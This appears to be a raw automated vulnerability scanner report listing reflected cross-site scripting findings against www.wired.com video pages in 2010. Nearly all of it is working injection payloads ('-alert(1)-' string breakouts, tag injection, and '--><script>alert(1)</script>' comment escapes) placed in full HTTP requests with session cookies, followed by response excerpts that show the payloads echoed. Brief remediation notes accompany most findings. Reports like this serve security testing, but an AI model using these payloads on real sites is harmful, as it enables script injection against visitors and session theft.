<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c924"><a>8ffe3551f0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos7c924"><a>8ffe3551f0e/highlights/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:51:20 GMT Date: Mon, 22 Nov 2010 00:46:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos7c924"><a>8ffe3551f0e c_highlights"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78d1e"-alert(1)-"0532cbb1e6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights78d1e"-alert(1)-"0532cbb1e6a/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:13 GMT Date: Mon, 22 Nov 2010 00:48:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106779
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a01"><a>8733d8ce931 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlights36a01"><a>8733d8ce931/1716440574/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=275 Expires: Mon, 22 Nov 2010 00:51:54 GMT Date: Mon, 22 Nov 2010 00:47:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106747
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlights36a01"><a>8733d8ce931"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40624"-alert(1)-"16bcb075647 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/171644057440624"-alert(1)-"16bcb075647/tron-legacy--the-payoff/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:29 GMT Date: Mon, 22 Nov 2010 00:48:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fc9c"-alert(1)-"b02f73af82f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/tron-legacy--the-payoff9fc9c"-alert(1)-"b02f73af82f/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:52 GMT Date: Mon, 22 Nov 2010 00:48:52 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106687
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40f1a"-alert(1)-"d99d5ed6aaf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/66614493900140f1a"-alert(1)-"d99d5ed6aaf HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:54:02 GMT Date: Mon, 22 Nov 2010 00:49:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106687
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86308"><a>f32b843750c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video86308"><a>f32b843750c/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29421 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:48 GMT Date: Mon, 22 Nov 2010 00:38:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video86308"><a>f32b843750c ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 290c1--><script>alert(1)</script>bf3897741a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video290c1--><script>alert(1)</script>bf3897741a4/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29460 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:36 GMT Date: Mon, 22 Nov 2010 00:39:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video290c1--><script>alert(1)</script>bf3897741a4/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7799c"><a>3f7467ea934 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos7799c"><a>3f7467ea934/latest/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=280 Expires: Mon, 22 Nov 2010 00:44:25 GMT Date: Mon, 22 Nov 2010 00:39:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos7799c"><a>3f7467ea934 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff824"-alert(1)-"f06fa475ad8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videosff824"-alert(1)-"f06fa475ad8/latest/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=285 Expires: Mon, 22 Nov 2010 00:46:10 GMT Date: Mon, 22 Nov 2010 00:41:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 533c5"-alert(1)-"4bb8706c87e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest533c5"-alert(1)-"4bb8706c87e/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=299 Expires: Mon, 22 Nov 2010 00:47:22 GMT Date: Mon, 22 Nov 2010 00:42:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee85a"><a>e2676fa6cb5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latestee85a"><a>e2676fa6cb5/1815816633/a-walle-for-roadside-bombs/660653911001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:46:25 GMT Date: Mon, 22 Nov 2010 00:41:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latestee85a"><a>e2676fa6cb5"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 528de"-alert(1)-"2cc92763f9f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633528de"-alert(1)-"2cc92763f9f/a-walle-for-roadside-bombs/660653911001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:46 GMT Date: Mon, 22 Nov 2010 00:42:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfc05"-alert(1)-"808e58c0512 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/a-walle-for-roadside-bombscfc05"-alert(1)-"808e58c0512/660653911001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=285 Expires: Mon, 22 Nov 2010 00:47:45 GMT Date: Mon, 22 Nov 2010 00:43:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106682
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94a45"-alert(1)-"0b8e91ffbd8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/66065391100194a45"-alert(1)-"0b8e91ffbd8 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=272 Expires: Mon, 22 Nov 2010 00:47:51 GMT Date: Mon, 22 Nov 2010 00:43:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106746
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1feae"><a>906cb8c65f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video1feae"><a>906cb8c65f/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29437 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:45:40 GMT Date: Mon, 22 Nov 2010 00:40:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video1feae"><a>906cb8c65f ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 71840--><script>alert(1)</script>ad628cf891f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video71840--><script>alert(1)</script>ad628cf891f/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29478 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:56 GMT Date: Mon, 22 Nov 2010 00:41:56 GMT Connection: close
